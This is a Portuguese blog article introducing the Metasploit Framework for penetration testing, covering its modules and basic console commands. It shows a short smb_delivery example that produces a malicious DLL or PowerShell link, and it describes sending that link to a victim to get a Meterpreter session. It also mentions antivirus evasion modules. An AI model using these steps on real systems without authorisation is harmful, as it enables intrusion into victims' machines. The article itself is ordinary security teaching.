Metasploit – Uma das melhores ferramentas de Pentest

Em cybersecurity um “exploit” é uma forma de “explorar” uma determinada vulnerabilidade através de um código seja um software ou um código.

Ao fazer um pentest é uma das tarefas do profissional é analisar o ambiente e identificar se existe alguma vulnerabilidade que possa ser explorada e como explorar. Esse é um processos de Análise de Risco.

São muitas a “brechas” que podem ser exploradas e de diversas maneiras. Quando estamos falando de sistemas uma das ferramentas que permite de maneira fácil explorar brechas é o Metasploit Framework.

O MSF é uma das ferramentas de auditoria de segurança mais úteis disponíveis hoje gratuitamente aos profissionais de segurança, pois é um conjunto com muitos recursos de analise de segurança que vão além da simples exploração de uma determinada brecha.

Existe uma lista enorme de “exploits” de nível comercial e um ambiente de desenvolvimento de exploits, até ferramentas de coleta de informações em rede e plugins de vulnerabilidade na Web, o Metasploit Framework é um ambiente completo e impressionante.

O Metasploit está escrito em Ruby e está em desenvolvimento há muitos anos.

Eu uso o Kali linux e gosto de usar o Metasploit através dele. E neste artigo eu estou usando o Metasploit na ultima versão do Kali 2020. E você pode iniciar usando comando msfconsole:

O Metasploit contém diversos módulos e vamos entender o que faz cada um.

  • exploits – Módulo que contém milhares de exploits
  • payloads – Código que é executado remotamente com o exploit
  • auxiliary – Contém scanners de portas, fuzzers, sniffers e muito mais.
  • nops – mantêm os tamanhos payloads consistentes
  • post – Recursos usados pós exploração
  • encoders – Codificadores que garante o payload ser executado.
  • evasion (somente no Metasploit 5) – Usados para “evadir” antivírus

Os comandos básicos são:

  • msf > showComando utilizado para exibir informação
  • msf > useComando utilizado para carregar um modulo
  • msf > show optionsExibe as opções do modulo carregado
  • msf > set Define opções que você consultou com o comando show options
  • msf > infoExibe info do modulo carregado
  • msf > searchComando importante, pois ajuda a encontrar exploits, payloads e outros recursos. Exemplo msf > search type:exploit platform:windows SMB
  • msf > backVoltar
  • msf > exit Sair do Metasploit

https://www.offensive-security.com/metasploit-unleashed/

Depois que uma exploração acontecer vamos ter acesso ao MeterPreter e pode executar diversos comandos.

Um exemplo bem simples de usar o Metasploit é usando um payload através de um servidor que aceita comunicação SMB Atualmente suporta DLLs e Powershell.

use exploit/windows/smb/smb_delivery
set srvhost 192.168.x.x
exploit
use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109
msf exploit(windows/smb/smb_delivery) > exploit

Isso irá gerar um link para o arquivo DLL ou Powershell malicioso, no qual você envia o link para o seu destino (alvo) e aguarde a ação dele.
Assim que a vítima executar o código malicioso teremos uma sessão do “meterpreter” Metasploit.

Exploits, Playloads e ShellCode

No vídeo abaixo eu usao o metasploit para criar um payload e explorar um sistema Windows.

Anúncio

Sobre Daniel Donda 549 Artigos
Olá, meu nome é Daniel Donda e sou especialista em cibersegurança, autor de livros, professor e palestrante. Saiba mais

1 Trackback / Pingback

  1. Metasploit framework –Meterpreter – Daniel Donda

Faça um comentário

Seu e-mail não será divulgado.


*